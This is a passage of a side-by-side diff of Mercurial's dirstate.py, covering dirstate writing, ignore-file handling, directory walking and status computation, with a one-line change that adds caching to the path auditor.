753 self._lastnormaltime = lastnormaltime
754
754
755 if self._origpl is None:
755 if self._origpl is None:
756 self._origpl = self._pl
756 self._origpl = self._pl
757 self._pl = (parent, nullid)
757 self._pl = (parent, nullid)
758 for f in changedfiles:
758 for f in changedfiles:
759 if f in allfiles:
759 if f in allfiles:
760 self.normallookup(f)
760 self.normallookup(f)
761 else:
761 else:
762 self.drop(f)
762 self.drop(f)
763
763
764 self._dirty = True
764 self._dirty = True
765
765
766 def identity(self):
766 def identity(self):
767 '''Return identity of dirstate itself to detect changing in storage
767 '''Return identity of dirstate itself to detect changing in storage
768
768
769 If identity of previous dirstate is equal to this, writing
769 If identity of previous dirstate is equal to this, writing
770 changes based on the former dirstate out can keep consistency.
770 changes based on the former dirstate out can keep consistency.
771 '''
771 '''
772 return self._identity
772 return self._identity
773
773
774 def write(self, tr):
774 def write(self, tr):
775 if not self._dirty:
775 if not self._dirty:
776 return
776 return
777
777
778 filename = self._filename
778 filename = self._filename
779 if tr:
779 if tr:
780 # 'dirstate.write()' is not only for writing in-memory
780 # 'dirstate.write()' is not only for writing in-memory
781 # changes out, but also for dropping ambiguous timestamp.
781 # changes out, but also for dropping ambiguous timestamp.
782 # delayed writing re-raise "ambiguous timestamp issue".
782 # delayed writing re-raise "ambiguous timestamp issue".
783 # See also the wiki page below for detail:
783 # See also the wiki page below for detail:
784 # https://www.mercurial-scm.org/wiki/DirstateTransactionPlan
784 # https://www.mercurial-scm.org/wiki/DirstateTransactionPlan
785
785
786 # emulate dropping timestamp in 'parsers.pack_dirstate'
786 # emulate dropping timestamp in 'parsers.pack_dirstate'
787 now = _getfsnow(self._opener)
787 now = _getfsnow(self._opener)
788 dmap = self._map
788 dmap = self._map
789 for f in self._updatedfiles:
789 for f in self._updatedfiles:
790 e = dmap.get(f)
790 e = dmap.get(f)
791 if e is not None and e[0] == 'n' and e[3] == now:
791 if e is not None and e[0] == 'n' and e[3] == now:
792 dmap[f] = dirstatetuple(e[0], e[1], e[2], -1)
792 dmap[f] = dirstatetuple(e[0], e[1], e[2], -1)
793 self._nonnormalset.add(f)
793 self._nonnormalset.add(f)
794
794
795 # emulate that all 'dirstate.normal' results are written out
795 # emulate that all 'dirstate.normal' results are written out
796 self._lastnormaltime = 0
796 self._lastnormaltime = 0
797 self._updatedfiles.clear()
797 self._updatedfiles.clear()
798
798
799 # delay writing in-memory changes out
799 # delay writing in-memory changes out
800 tr.addfilegenerator('dirstate', (self._filename,),
800 tr.addfilegenerator('dirstate', (self._filename,),
801 self._writedirstate, location='plain')
801 self._writedirstate, location='plain')
802 return
802 return
803
803
804 st = self._opener(filename, "w", atomictemp=True, checkambig=True)
804 st = self._opener(filename, "w", atomictemp=True, checkambig=True)
805 self._writedirstate(st)
805 self._writedirstate(st)
806
806
807 def addparentchangecallback(self, category, callback):
807 def addparentchangecallback(self, category, callback):
808 """add a callback to be called when the wd parents are changed
808 """add a callback to be called when the wd parents are changed
809
809
810 Callback will be called with the following arguments:
810 Callback will be called with the following arguments:
811 dirstate, (oldp1, oldp2), (newp1, newp2)
811 dirstate, (oldp1, oldp2), (newp1, newp2)
812
812
813 Category is a unique identifier to allow overwriting an old callback
813 Category is a unique identifier to allow overwriting an old callback
814 with a newer callback.
814 with a newer callback.
815 """
815 """
816 self._plchangecallbacks[category] = callback
816 self._plchangecallbacks[category] = callback
817
817
818 def _writedirstate(self, st):
818 def _writedirstate(self, st):
819 # notify callbacks about parents change
819 # notify callbacks about parents change
820 if self._origpl is not None and self._origpl != self._pl:
820 if self._origpl is not None and self._origpl != self._pl:
821 for c, callback in sorted(self._plchangecallbacks.iteritems()):
821 for c, callback in sorted(self._plchangecallbacks.iteritems()):
822 callback(self, self._origpl, self._pl)
822 callback(self, self._origpl, self._pl)
823 self._origpl = None
823 self._origpl = None
824 # use the modification time of the newly created temporary file as the
824 # use the modification time of the newly created temporary file as the
825 # filesystem's notion of 'now'
825 # filesystem's notion of 'now'
826 now = util.fstat(st).st_mtime & _rangemask
826 now = util.fstat(st).st_mtime & _rangemask
827
827
828 # enough 'delaywrite' prevents 'pack_dirstate' from dropping
828 # enough 'delaywrite' prevents 'pack_dirstate' from dropping
829 # timestamp of each entries in dirstate, because of 'now > mtime'
829 # timestamp of each entries in dirstate, because of 'now > mtime'
830 delaywrite = self._ui.configint('debug', 'dirstate.delaywrite', 0)
830 delaywrite = self._ui.configint('debug', 'dirstate.delaywrite', 0)
831 if delaywrite > 0:
831 if delaywrite > 0:
832 # do we have any files to delay for?
832 # do we have any files to delay for?
833 for f, e in self._map.iteritems():
833 for f, e in self._map.iteritems():
834 if e[0] == 'n' and e[3] == now:
834 if e[0] == 'n' and e[3] == now:
835 import time # to avoid useless import
835 import time # to avoid useless import
836 # rather than sleep n seconds, sleep until the next
836 # rather than sleep n seconds, sleep until the next
837 # multiple of n seconds
837 # multiple of n seconds
838 clock = time.time()
838 clock = time.time()
839 start = int(clock) - (int(clock) % delaywrite)
839 start = int(clock) - (int(clock) % delaywrite)
840 end = start + delaywrite
840 end = start + delaywrite
841 time.sleep(end - clock)
841 time.sleep(end - clock)
842 now = end # trust our estimate that the end is near now
842 now = end # trust our estimate that the end is near now
843 break
843 break
844
844
845 st.write(parsers.pack_dirstate(self._map, self._copymap, self._pl, now))
845 st.write(parsers.pack_dirstate(self._map, self._copymap, self._pl, now))
846 self._nonnormalset, self._otherparentset = nonnormalentries(self._map)
846 self._nonnormalset, self._otherparentset = nonnormalentries(self._map)
847 st.close()
847 st.close()
848 self._lastnormaltime = 0
848 self._lastnormaltime = 0
849 self._dirty = self._dirtypl = False
849 self._dirty = self._dirtypl = False
850
850
851 def _dirignore(self, f):
851 def _dirignore(self, f):
852 if f == '.':
852 if f == '.':
853 return False
853 return False
854 if self._ignore(f):
854 if self._ignore(f):
855 return True
855 return True
856 for p in util.finddirs(f):
856 for p in util.finddirs(f):
857 if self._ignore(p):
857 if self._ignore(p):
858 return True
858 return True
859 return False
859 return False
860
860
861 def _ignorefiles(self):
861 def _ignorefiles(self):
862 files = []
862 files = []
863 if os.path.exists(self._join('.hgignore')):
863 if os.path.exists(self._join('.hgignore')):
864 files.append(self._join('.hgignore'))
864 files.append(self._join('.hgignore'))
865 for name, path in self._ui.configitems("ui"):
865 for name, path in self._ui.configitems("ui"):
866 if name == 'ignore' or name.startswith('ignore.'):
866 if name == 'ignore' or name.startswith('ignore.'):
867 # we need to use os.path.join here rather than self._join
867 # we need to use os.path.join here rather than self._join
868 # because path is arbitrary and user-specified
868 # because path is arbitrary and user-specified
869 files.append(os.path.join(self._rootdir, util.expandpath(path)))
869 files.append(os.path.join(self._rootdir, util.expandpath(path)))
870 return files
870 return files
871
871
872 def _ignorefileandline(self, f):
872 def _ignorefileandline(self, f):
873 files = collections.deque(self._ignorefiles())
873 files = collections.deque(self._ignorefiles())
874 visited = set()
874 visited = set()
875 while files:
875 while files:
876 i = files.popleft()
876 i = files.popleft()
877 patterns = matchmod.readpatternfile(i, self._ui.warn,
877 patterns = matchmod.readpatternfile(i, self._ui.warn,
878 sourceinfo=True)
878 sourceinfo=True)
879 for pattern, lineno, line in patterns:
879 for pattern, lineno, line in patterns:
880 kind, p = matchmod._patsplit(pattern, 'glob')
880 kind, p = matchmod._patsplit(pattern, 'glob')
881 if kind == "subinclude":
881 if kind == "subinclude":
882 if p not in visited:
882 if p not in visited:
883 files.append(p)
883 files.append(p)
884 continue
884 continue
885 m = matchmod.match(self._root, '', [], [pattern],
885 m = matchmod.match(self._root, '', [], [pattern],
886 warn=self._ui.warn)
886 warn=self._ui.warn)
887 if m(f):
887 if m(f):
888 return (i, lineno, line)
888 return (i, lineno, line)
889 visited.add(i)
889 visited.add(i)
890 return (None, -1, "")
890 return (None, -1, "")
891
891
892 def _walkexplicit(self, match, subrepos):
892 def _walkexplicit(self, match, subrepos):
893 '''Get stat data about the files explicitly specified by match.
893 '''Get stat data about the files explicitly specified by match.
894
894
895 Return a triple (results, dirsfound, dirsnotfound).
895 Return a triple (results, dirsfound, dirsnotfound).
896 - results is a mapping from filename to stat result. It also contains
896 - results is a mapping from filename to stat result. It also contains
897 listings mapping subrepos and .hg to None.
897 listings mapping subrepos and .hg to None.
898 - dirsfound is a list of files found to be directories.
898 - dirsfound is a list of files found to be directories.
899 - dirsnotfound is a list of files that the dirstate thinks are
899 - dirsnotfound is a list of files that the dirstate thinks are
900 directories and that were not found.'''
900 directories and that were not found.'''
901
901
902 def badtype(mode):
902 def badtype(mode):
903 kind = _('unknown')
903 kind = _('unknown')
904 if stat.S_ISCHR(mode):
904 if stat.S_ISCHR(mode):
905 kind = _('character device')
905 kind = _('character device')
906 elif stat.S_ISBLK(mode):
906 elif stat.S_ISBLK(mode):
907 kind = _('block device')
907 kind = _('block device')
908 elif stat.S_ISFIFO(mode):
908 elif stat.S_ISFIFO(mode):
909 kind = _('fifo')
909 kind = _('fifo')
910 elif stat.S_ISSOCK(mode):
910 elif stat.S_ISSOCK(mode):
911 kind = _('socket')
911 kind = _('socket')
912 elif stat.S_ISDIR(mode):
912 elif stat.S_ISDIR(mode):
913 kind = _('directory')
913 kind = _('directory')
914 return _('unsupported file type (type is %s)') % kind
914 return _('unsupported file type (type is %s)') % kind
915
915
916 matchedir = match.explicitdir
916 matchedir = match.explicitdir
917 badfn = match.bad
917 badfn = match.bad
918 dmap = self._map
918 dmap = self._map
919 lstat = os.lstat
919 lstat = os.lstat
920 getkind = stat.S_IFMT
920 getkind = stat.S_IFMT
921 dirkind = stat.S_IFDIR
921 dirkind = stat.S_IFDIR
922 regkind = stat.S_IFREG
922 regkind = stat.S_IFREG
923 lnkkind = stat.S_IFLNK
923 lnkkind = stat.S_IFLNK
924 join = self._join
924 join = self._join
925 dirsfound = []
925 dirsfound = []
926 foundadd = dirsfound.append
926 foundadd = dirsfound.append
927 dirsnotfound = []
927 dirsnotfound = []
928 notfoundadd = dirsnotfound.append
928 notfoundadd = dirsnotfound.append
929
929
930 if not match.isexact() and self._checkcase:
930 if not match.isexact() and self._checkcase:
931 normalize = self._normalize
931 normalize = self._normalize
932 else:
932 else:
933 normalize = None
933 normalize = None
934
934
935 files = sorted(match.files())
935 files = sorted(match.files())
936 subrepos.sort()
936 subrepos.sort()
937 i, j = 0, 0
937 i, j = 0, 0
938 while i < len(files) and j < len(subrepos):
938 while i < len(files) and j < len(subrepos):
939 subpath = subrepos[j] + "/"
939 subpath = subrepos[j] + "/"
940 if files[i] < subpath:
940 if files[i] < subpath:
941 i += 1
941 i += 1
942 continue
942 continue
943 while i < len(files) and files[i].startswith(subpath):
943 while i < len(files) and files[i].startswith(subpath):
944 del files[i]
944 del files[i]
945 j += 1
945 j += 1
946
946
947 if not files or '.' in files:
947 if not files or '.' in files:
948 files = ['.']
948 files = ['.']
949 results = dict.fromkeys(subrepos)
949 results = dict.fromkeys(subrepos)
950 results['.hg'] = None
950 results['.hg'] = None
951
951
952 alldirs = None
952 alldirs = None
953 for ff in files:
953 for ff in files:
954 # constructing the foldmap is expensive, so don't do it for the
954 # constructing the foldmap is expensive, so don't do it for the
955 # common case where files is ['.']
955 # common case where files is ['.']
956 if normalize and ff != '.':
956 if normalize and ff != '.':
957 nf = normalize(ff, False, True)
957 nf = normalize(ff, False, True)
958 else:
958 else:
959 nf = ff
959 nf = ff
960 if nf in results:
960 if nf in results:
961 continue
961 continue
962
962
963 try:
963 try:
964 st = lstat(join(nf))
964 st = lstat(join(nf))
965 kind = getkind(st.st_mode)
965 kind = getkind(st.st_mode)
966 if kind == dirkind:
966 if kind == dirkind:
967 if nf in dmap:
967 if nf in dmap:
968 # file replaced by dir on disk but still in dirstate
968 # file replaced by dir on disk but still in dirstate
969 results[nf] = None
969 results[nf] = None
970 if matchedir:
970 if matchedir:
971 matchedir(nf)
971 matchedir(nf)
972 foundadd((nf, ff))
972 foundadd((nf, ff))
973 elif kind == regkind or kind == lnkkind:
973 elif kind == regkind or kind == lnkkind:
974 results[nf] = st
974 results[nf] = st
975 else:
975 else:
976 badfn(ff, badtype(kind))
976 badfn(ff, badtype(kind))
977 if nf in dmap:
977 if nf in dmap:
978 results[nf] = None
978 results[nf] = None
979 except OSError as inst: # nf not found on disk - it is dirstate only
979 except OSError as inst: # nf not found on disk - it is dirstate only
980 if nf in dmap: # does it exactly match a missing file?
980 if nf in dmap: # does it exactly match a missing file?
981 results[nf] = None
981 results[nf] = None
982 else: # does it match a missing directory?
982 else: # does it match a missing directory?
983 if alldirs is None:
983 if alldirs is None:
984 alldirs = util.dirs(dmap)
984 alldirs = util.dirs(dmap)
985 if nf in alldirs:
985 if nf in alldirs:
986 if matchedir:
986 if matchedir:
987 matchedir(nf)
987 matchedir(nf)
988 notfoundadd(nf)
988 notfoundadd(nf)
989 else:
989 else:
990 badfn(ff, inst.strerror)
990 badfn(ff, inst.strerror)
991
991
992 # Case insensitive filesystems cannot rely on lstat() failing to detect
992 # Case insensitive filesystems cannot rely on lstat() failing to detect
993 # a case-only rename. Prune the stat object for any file that does not
993 # a case-only rename. Prune the stat object for any file that does not
994 # match the case in the filesystem, if there are multiple files that
994 # match the case in the filesystem, if there are multiple files that
995 # normalize to the same path.
995 # normalize to the same path.
996 if match.isexact() and self._checkcase:
996 if match.isexact() and self._checkcase:
997 normed = {}
997 normed = {}
998
998
999 for f, st in results.iteritems():
999 for f, st in results.iteritems():
1000 if st is None:
1000 if st is None:
1001 continue
1001 continue
1002
1002
1003 nc = util.normcase(f)
1003 nc = util.normcase(f)
1004 paths = normed.get(nc)
1004 paths = normed.get(nc)
1005
1005
1006 if paths is None:
1006 if paths is None:
1007 paths = set()
1007 paths = set()
1008 normed[nc] = paths
1008 normed[nc] = paths
1009
1009
1010 paths.add(f)
1010 paths.add(f)
1011
1011
1012 for norm, paths in normed.iteritems():
1012 for norm, paths in normed.iteritems():
1013 if len(paths) > 1:
1013 if len(paths) > 1:
1014 for path in paths:
1014 for path in paths:
1015 folded = self._discoverpath(path, norm, True, None,
1015 folded = self._discoverpath(path, norm, True, None,
1016 self._dirfoldmap)
1016 self._dirfoldmap)
1017 if path != folded:
1017 if path != folded:
1018 results[path] = None
1018 results[path] = None
1019
1019
1020 return results, dirsfound, dirsnotfound
1020 return results, dirsfound, dirsnotfound
1021
1021
1022 def walk(self, match, subrepos, unknown, ignored, full=True):
1022 def walk(self, match, subrepos, unknown, ignored, full=True):
1023 '''
1023 '''
1024 Walk recursively through the directory tree, finding all files
1024 Walk recursively through the directory tree, finding all files
1025 matched by match.
1025 matched by match.
1026
1026
1027 If full is False, maybe skip some known-clean files.
1027 If full is False, maybe skip some known-clean files.
1028
1028
1029 Return a dict mapping filename to stat-like object (either
1029 Return a dict mapping filename to stat-like object (either
1030 mercurial.osutil.stat instance or return value of os.stat()).
1030 mercurial.osutil.stat instance or return value of os.stat()).
1031
1031
1032 '''
1032 '''
1033 # full is a flag that extensions that hook into walk can use -- this
1033 # full is a flag that extensions that hook into walk can use -- this
1034 # implementation doesn't use it at all. This satisfies the contract
1034 # implementation doesn't use it at all. This satisfies the contract
1035 # because we only guarantee a "maybe".
1035 # because we only guarantee a "maybe".
1036
1036
1037 if ignored:
1037 if ignored:
1038 ignore = util.never
1038 ignore = util.never
1039 dirignore = util.never
1039 dirignore = util.never
1040 elif unknown:
1040 elif unknown:
1041 ignore = self._ignore
1041 ignore = self._ignore
1042 dirignore = self._dirignore
1042 dirignore = self._dirignore
1043 else:
1043 else:
1044 # if not unknown and not ignored, drop dir recursion and step 2
1044 # if not unknown and not ignored, drop dir recursion and step 2
1045 ignore = util.always
1045 ignore = util.always
1046 dirignore = util.always
1046 dirignore = util.always
1047
1047
1048 matchfn = match.matchfn
1048 matchfn = match.matchfn
1049 matchalways = match.always()
1049 matchalways = match.always()
1050 matchtdir = match.traversedir
1050 matchtdir = match.traversedir
1051 dmap = self._map
1051 dmap = self._map
1052 listdir = util.listdir
1052 listdir = util.listdir
1053 lstat = os.lstat
1053 lstat = os.lstat
1054 dirkind = stat.S_IFDIR
1054 dirkind = stat.S_IFDIR
1055 regkind = stat.S_IFREG
1055 regkind = stat.S_IFREG
1056 lnkkind = stat.S_IFLNK
1056 lnkkind = stat.S_IFLNK
1057 join = self._join
1057 join = self._join
1058
1058
1059 exact = skipstep3 = False
1059 exact = skipstep3 = False
1060 if match.isexact(): # match.exact
1060 if match.isexact(): # match.exact
1061 exact = True
1061 exact = True
1062 dirignore = util.always # skip step 2
1062 dirignore = util.always # skip step 2
1063 elif match.prefix(): # match.match, no patterns
1063 elif match.prefix(): # match.match, no patterns
1064 skipstep3 = True
1064 skipstep3 = True
1065
1065
1066 if not exact and self._checkcase:
1066 if not exact and self._checkcase:
1067 normalize = self._normalize
1067 normalize = self._normalize
1068 normalizefile = self._normalizefile
1068 normalizefile = self._normalizefile
1069 skipstep3 = False
1069 skipstep3 = False
1070 else:
1070 else:
1071 normalize = self._normalize
1071 normalize = self._normalize
1072 normalizefile = None
1072 normalizefile = None
1073
1073
1074 # step 1: find all explicit files
1074 # step 1: find all explicit files
1075 results, work, dirsnotfound = self._walkexplicit(match, subrepos)
1075 results, work, dirsnotfound = self._walkexplicit(match, subrepos)
1076
1076
1077 skipstep3 = skipstep3 and not (work or dirsnotfound)
1077 skipstep3 = skipstep3 and not (work or dirsnotfound)
1078 work = [d for d in work if not dirignore(d[0])]
1078 work = [d for d in work if not dirignore(d[0])]
1079
1079
1080 # step 2: visit subdirectories
1080 # step 2: visit subdirectories
1081 def traverse(work, alreadynormed):
1081 def traverse(work, alreadynormed):
1082 wadd = work.append
1082 wadd = work.append
1083 while work:
1083 while work:
1084 nd = work.pop()
1084 nd = work.pop()
1085 if not match.visitdir(nd):
1085 if not match.visitdir(nd):
1086 continue
1086 continue
1087 skip = None
1087 skip = None
1088 if nd == '.':
1088 if nd == '.':
1089 nd = ''
1089 nd = ''
1090 else:
1090 else:
1091 skip = '.hg'
1091 skip = '.hg'
1092 try:
1092 try:
1093 entries = listdir(join(nd), stat=True, skip=skip)
1093 entries = listdir(join(nd), stat=True, skip=skip)
1094 except OSError as inst:
1094 except OSError as inst:
1095 if inst.errno in (errno.EACCES, errno.ENOENT):
1095 if inst.errno in (errno.EACCES, errno.ENOENT):
1096 match.bad(self.pathto(nd), inst.strerror)
1096 match.bad(self.pathto(nd), inst.strerror)
1097 continue
1097 continue
1098 raise
1098 raise
1099 for f, kind, st in entries:
1099 for f, kind, st in entries:
1100 if normalizefile:
1100 if normalizefile:
1101 # even though f might be a directory, we're only
1101 # even though f might be a directory, we're only
1102 # interested in comparing it to files currently in the
1102 # interested in comparing it to files currently in the
1103 # dmap -- therefore normalizefile is enough
1103 # dmap -- therefore normalizefile is enough
1104 nf = normalizefile(nd and (nd + "/" + f) or f, True,
1104 nf = normalizefile(nd and (nd + "/" + f) or f, True,
1105 True)
1105 True)
1106 else:
1106 else:
1107 nf = nd and (nd + "/" + f) or f
1107 nf = nd and (nd + "/" + f) or f
1108 if nf not in results:
1108 if nf not in results:
1109 if kind == dirkind:
1109 if kind == dirkind:
1110 if not ignore(nf):
1110 if not ignore(nf):
1111 if matchtdir:
1111 if matchtdir:
1112 matchtdir(nf)
1112 matchtdir(nf)
1113 wadd(nf)
1113 wadd(nf)
1114 if nf in dmap and (matchalways or matchfn(nf)):
1114 if nf in dmap and (matchalways or matchfn(nf)):
1115 results[nf] = None
1115 results[nf] = None
1116 elif kind == regkind or kind == lnkkind:
1116 elif kind == regkind or kind == lnkkind:
1117 if nf in dmap:
1117 if nf in dmap:
1118 if matchalways or matchfn(nf):
1118 if matchalways or matchfn(nf):
1119 results[nf] = st
1119 results[nf] = st
1120 elif ((matchalways or matchfn(nf))
1120 elif ((matchalways or matchfn(nf))
1121 and not ignore(nf)):
1121 and not ignore(nf)):
1122 # unknown file -- normalize if necessary
1122 # unknown file -- normalize if necessary
1123 if not alreadynormed:
1123 if not alreadynormed:
1124 nf = normalize(nf, False, True)
1124 nf = normalize(nf, False, True)
1125 results[nf] = st
1125 results[nf] = st
1126 elif nf in dmap and (matchalways or matchfn(nf)):
1126 elif nf in dmap and (matchalways or matchfn(nf)):
1127 results[nf] = None
1127 results[nf] = None
1128
1128
1129 for nd, d in work:
1129 for nd, d in work:
1130 # alreadynormed means that processwork doesn't have to do any
1130 # alreadynormed means that processwork doesn't have to do any
1131 # expensive directory normalization
1131 # expensive directory normalization
1132 alreadynormed = not normalize or nd == d
1132 alreadynormed = not normalize or nd == d
1133 traverse([d], alreadynormed)
1133 traverse([d], alreadynormed)
1134
1134
1135 for s in subrepos:
1135 for s in subrepos:
1136 del results[s]
1136 del results[s]
1137 del results['.hg']
1137 del results['.hg']
1138
1138
1139 # step 3: visit remaining files from dmap
1139 # step 3: visit remaining files from dmap
1140 if not skipstep3 and not exact:
1140 if not skipstep3 and not exact:
1141 # If a dmap file is not in results yet, it was either
1141 # If a dmap file is not in results yet, it was either
1142 # a) not matching matchfn b) ignored, c) missing, or d) under a
1142 # a) not matching matchfn b) ignored, c) missing, or d) under a
1143 # symlink directory.
1143 # symlink directory.
1144 if not results and matchalways:
1144 if not results and matchalways:
1145 visit = [f for f in dmap]
1145 visit = [f for f in dmap]
1146 else:
1146 else:
1147 visit = [f for f in dmap if f not in results and matchfn(f)]
1147 visit = [f for f in dmap if f not in results and matchfn(f)]
1148 visit.sort()
1148 visit.sort()
1149
1149
1150 if unknown:
1150 if unknown:
1151 # unknown == True means we walked all dirs under the roots
1151 # unknown == True means we walked all dirs under the roots
1152 # that wasn't ignored, and everything that matched was stat'ed
1152 # that wasn't ignored, and everything that matched was stat'ed
1153 # and is already in results.
1153 # and is already in results.
1154 # The rest must thus be ignored or under a symlink.
1154 # The rest must thus be ignored or under a symlink.
1155 audit_path = pathutil.pathauditor(self._root)
1155 audit_path = pathutil.pathauditor(self._root, cached=True)
1156
1156
1157 for nf in iter(visit):
1157 for nf in iter(visit):
1158 # If a stat for the same file was already added with a
1158 # If a stat for the same file was already added with a
1159 # different case, don't add one for this, since that would
1159 # different case, don't add one for this, since that would
1160 # make it appear as if the file exists under both names
1160 # make it appear as if the file exists under both names
1161 # on disk.
1161 # on disk.
1162 if (normalizefile and
1162 if (normalizefile and
1163 normalizefile(nf, True, True) in results):
1163 normalizefile(nf, True, True) in results):
1164 results[nf] = None
1164 results[nf] = None
1165 # Report ignored items in the dmap as long as they are not
1165 # Report ignored items in the dmap as long as they are not
1166 # under a symlink directory.
1166 # under a symlink directory.
1167 elif audit_path.check(nf):
1167 elif audit_path.check(nf):
1168 try:
1168 try:
1169 results[nf] = lstat(join(nf))
1169 results[nf] = lstat(join(nf))
1170 # file was just ignored, no links, and exists
1170 # file was just ignored, no links, and exists
1171 except OSError:
1171 except OSError:
1172 # file doesn't exist
1172 # file doesn't exist
1173 results[nf] = None
1173 results[nf] = None
1174 else:
1174 else:
1175 # It's either missing or under a symlink directory
1175 # It's either missing or under a symlink directory
1176 # which we in this case report as missing
1176 # which we in this case report as missing
1177 results[nf] = None
1177 results[nf] = None
1178 else:
1178 else:
1179 # We may not have walked the full directory tree above,
1179 # We may not have walked the full directory tree above,
1180 # so stat and check everything we missed.
1180 # so stat and check everything we missed.
1181 iv = iter(visit)
1181 iv = iter(visit)
1182 for st in util.statfiles([join(i) for i in visit]):
1182 for st in util.statfiles([join(i) for i in visit]):
1183 results[next(iv)] = st
1183 results[next(iv)] = st
1184 return results
1184 return results
1185
1185
1186 def status(self, match, subrepos, ignored, clean, unknown):
1186 def status(self, match, subrepos, ignored, clean, unknown):
1187 '''Determine the status of the working copy relative to the
1187 '''Determine the status of the working copy relative to the
1188 dirstate and return a pair of (unsure, status), where status is of type
1188 dirstate and return a pair of (unsure, status), where status is of type
1189 scmutil.status and:
1189 scmutil.status and:
1190
1190
1191 unsure:
1191 unsure:
1192 files that might have been modified since the dirstate was
1192 files that might have been modified since the dirstate was
1193 written, but need to be read to be sure (size is the same
1193 written, but need to be read to be sure (size is the same
1194 but mtime differs)
1194 but mtime differs)
1195 status.modified:
1195 status.modified:
1196 files that have definitely been modified since the dirstate
1196 files that have definitely been modified since the dirstate
1197 was written (different size or mode)
1197 was written (different size or mode)
1198 status.clean:
1198 status.clean:
1199 files that have definitely not been modified since the
1199 files that have definitely not been modified since the
1200 dirstate was written
1200 dirstate was written
1201 '''
1201 '''
1202 listignored, listclean, listunknown = ignored, clean, unknown
1202 listignored, listclean, listunknown = ignored, clean, unknown
1203 lookup, modified, added, unknown, ignored = [], [], [], [], []
1203 lookup, modified, added, unknown, ignored = [], [], [], [], []
1204 removed, deleted, clean = [], [], []
1204 removed, deleted, clean = [], [], []
1205
1205
1206 dmap = self._map
1206 dmap = self._map
1207 ladd = lookup.append # aka "unsure"
1207 ladd = lookup.append # aka "unsure"
1208 madd = modified.append
1208 madd = modified.append
1209 aadd = added.append
1209 aadd = added.append
1210 uadd = unknown.append
1210 uadd = unknown.append
1211 iadd = ignored.append
1211 iadd = ignored.append
1212 radd = removed.append
1212 radd = removed.append
1213 dadd = deleted.append
1213 dadd = deleted.append
1214 cadd = clean.append
1214 cadd = clean.append
1215 mexact = match.exact
1215 mexact = match.exact
1216 dirignore = self._dirignore
1216 dirignore = self._dirignore
1217 checkexec = self._checkexec
1217 checkexec = self._checkexec
1218 copymap = self._copymap
1218 copymap = self._copymap
1219 lastnormaltime = self._lastnormaltime
1219 lastnormaltime = self._lastnormaltime
1220
1220
1221 # We need to do full walks when either
1221 # We need to do full walks when either
1222 # - we're listing all clean files, or
1222 # - we're listing all clean files, or
1223 # - match.traversedir does something, because match.traversedir should
1223 # - match.traversedir does something, because match.traversedir should
1224 # be called for every dir in the working dir
1224 # be called for every dir in the working dir
1225 full = listclean or match.traversedir is not None
1225 full = listclean or match.traversedir is not None
1226 for fn, st in self.walk(match, subrepos, listunknown, listignored,
1226 for fn, st in self.walk(match, subrepos, listunknown, listignored,
1227 full=full).iteritems():
1227 full=full).iteritems():
1228 if fn not in dmap:
1228 if fn not in dmap:
1229 if (listignored or mexact(fn)) and dirignore(fn):
1229 if (listignored or mexact(fn)) and dirignore(fn):
1230 if listignored:
1230 if listignored:
1231 iadd(fn)
1231 iadd(fn)
1232 else:
1232 else:
1233 uadd(fn)
1233 uadd(fn)
1234 continue
1234 continue
1235
1235
1236 # This is equivalent to 'state, mode, size, time = dmap[fn]' but not
1236 # This is equivalent to 'state, mode, size, time = dmap[fn]' but not
1237 # written like that for performance reasons. dmap[fn] is not a
1237 # written like that for performance reasons. dmap[fn] is not a
1238 # Python tuple in compiled builds. The CPython UNPACK_SEQUENCE
1238 # Python tuple in compiled builds. The CPython UNPACK_SEQUENCE
1239 # opcode has fast paths when the value to be unpacked is a tuple or
1239 # opcode has fast paths when the value to be unpacked is a tuple or
1240 # a list, but falls back to creating a full-fledged iterator in
1240 # a list, but falls back to creating a full-fledged iterator in
1241 # general. That is much slower than simply accessing and storing the
1241 # general. That is much slower than simply accessing and storing the
1242 # tuple members one by one.
1242 # tuple members one by one.
1243 t = dmap[fn]
1243 t = dmap[fn]
1244 state = t[0]
1244 state = t[0]
1245 mode = t[1]
1245 mode = t[1]
1246 size = t[2]
1246 size = t[2]
1247 time = t[3]
1247 time = t[3]
1248
1248
1249 if not st and state in "nma":
1249 if not st and state in "nma":
1250 dadd(fn)
1250 dadd(fn)
1251 elif state == 'n':
1251 elif state == 'n':
1252 if (size >= 0 and
1252 if (size >= 0 and
1253 ((size != st.st_size and size != st.st_size & _rangemask)
1253 ((size != st.st_size and size != st.st_size & _rangemask)
1254 or ((mode ^ st.st_mode) & 0o100 and checkexec))
1254 or ((mode ^ st.st_mode) & 0o100 and checkexec))
1255 or size == -2 # other parent
1255 or size == -2 # other parent
1256 or fn in copymap):
1256 or fn in copymap):
1257 madd(fn)
1257 madd(fn)
1258 elif time != st.st_mtime and time != st.st_mtime & _rangemask:
1258 elif time != st.st_mtime and time != st.st_mtime & _rangemask:
1259 ladd(fn)
1259 ladd(fn)
1260 elif st.st_mtime == lastnormaltime:
1260 elif st.st_mtime == lastnormaltime:
1261 # fn may have just been marked as normal and it may have
1261 # fn may have just been marked as normal and it may have
1262 # changed in the same second without changing its size.
1262 # changed in the same second without changing its size.
1263 # This can happen if we quickly do multiple commits.
1263 # This can happen if we quickly do multiple commits.
1264 # Force lookup, so we don't miss such a racy file change.
1264 # Force lookup, so we don't miss such a racy file change.
1265 ladd(fn)
1265 ladd(fn)
1266 elif listclean:
1266 elif listclean:
1267 cadd(fn)
1267 cadd(fn)
1268 elif state == 'm':
1268 elif state == 'm':
1269 madd(fn)
1269 madd(fn)
1270 elif state == 'a':
1270 elif state == 'a':
1271 aadd(fn)
1271 aadd(fn)
1272 elif state == 'r':
1272 elif state == 'r':
1273 radd(fn)
1273 radd(fn)
1274
1274
1275 return (lookup, scmutil.status(modified, added, removed, deleted,
1275 return (lookup, scmutil.status(modified, added, removed, deleted,
1276 unknown, ignored, clean))
1276 unknown, ignored, clean))
1277
1277
1278 def matches(self, match):
1278 def matches(self, match):
1279 '''
1279 '''
1280 return files in the dirstate (in whatever state) filtered by match
1280 return files in the dirstate (in whatever state) filtered by match
1281 '''
1281 '''
1282 dmap = self._map
1282 dmap = self._map
1283 if match.always():
1283 if match.always():
1284 return dmap.keys()
1284 return dmap.keys()
1285 files = match.files()
1285 files = match.files()
1286 if match.isexact():
1286 if match.isexact():
1287 # fast path -- filter the other way around, since typically files is
1287 # fast path -- filter the other way around, since typically files is
1288 # much smaller than dmap
1288 # much smaller than dmap
1289 return [f for f in files if f in dmap]
1289 return [f for f in files if f in dmap]
1290 if match.prefix() and all(fn in dmap for fn in files):
1290 if match.prefix() and all(fn in dmap for fn in files):
1291 # fast path -- all the values are known to be files, so just return
